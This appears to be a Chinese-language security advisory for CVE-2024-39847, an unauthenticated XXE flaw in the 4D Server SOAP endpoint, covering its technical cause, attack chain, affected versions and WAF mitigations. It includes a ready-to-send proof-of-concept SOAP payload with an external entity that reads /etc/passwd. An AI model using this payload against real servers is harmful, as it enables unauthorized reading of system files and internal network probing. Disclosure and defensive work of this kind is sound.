CVE-2024-39847 CVSS 7.5 高危

CVE-2024-39847: 4D Server SOAP端点XXE漏洞

披露日期: 2026-04-30

来源: 23637b5d-af4c-4cf9-b8f6-deb7fd0f8423

漏洞信息

漏洞编号

CVE-2024-39847

漏洞类型

XML外部实体注入 (XXE)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

4D Server

漏洞概述

CVE-2024-39847是4D Server中SOAP端点的一个安全漏洞。由于XML解析器配置不当，未经身份验证的远程攻击者可利用此缺陷，通过发送特制的SOAP请求读取服务器上的敏感文件，访问相邻网络共享，并利用服务器发起HTTP GET请求对内部网络进行探测。

技术细节

该漏洞的核心在于4D Server处理SOAP请求时使用的XML解析器未正确禁用Document Type Definition (DTD) 外部实体。攻击者可以构造恶意的XML数据包，在DOCTYPE声明中定义一个指向本地文件系统（如file:///etc/passwd）或内部网络资源的SYSTEM实体。当服务器解析此XML时，它会根据实体的定义去读取本地文件内容或向目标URL发起请求，并将结果包含在响应中返回给攻击者。由于无需任何用户交互或身份认证，该漏洞极易被利用进行信息泄露和服务器端请求伪造（SSRF）攻击。

攻击链分析

STEP 1

步骤1：目标发现

攻击者通过网络扫描发现4D Server开放的SOAP服务接口。

STEP 2

步骤2：构造恶意载荷

攻击者编写包含XML外部实体定义的恶意SOAP请求报文，旨在读取本地文件或发起网络请求。

STEP 3

步骤3：发送请求

攻击者将构造好的XML数据发送至目标服务器的SOAP端点。

STEP 4

步骤4：解析与回显

服务器解析恶意XML，执行文件读取或HTTP请求操作，并将结果在响应中返回，完成信息窃取或SSRF探测。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2024-39847 (4D Server XXE)
Target: 4D Server SOAP Endpoint
-->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SomeOperation>
      <parameter>&xxe;</parameter>
    </SomeOperation>
  </soap:Body>
</soap:Envelope>

影响范围

4D v20 < R6

4D v19 < R11

4D v18 LTS < R7

防御指南

临时缓解措施

在应用防火墙（WAF）层面配置规则，拦截包含DOCTYPE或ENTITY关键字的XML请求；限制服务器对外的出站网络访问权限，防止SSRF攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2024-39847
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2024-39847
3 Details https://www.cvedetails.com/cve/CVE-2024-39847/
4 VulDB https://vuldb.com/cve/CVE-2024-39847
5 Link https://4d.com
6 Link https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/
7 Link http://seclists.org/fulldisclosure/2026/May/0

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表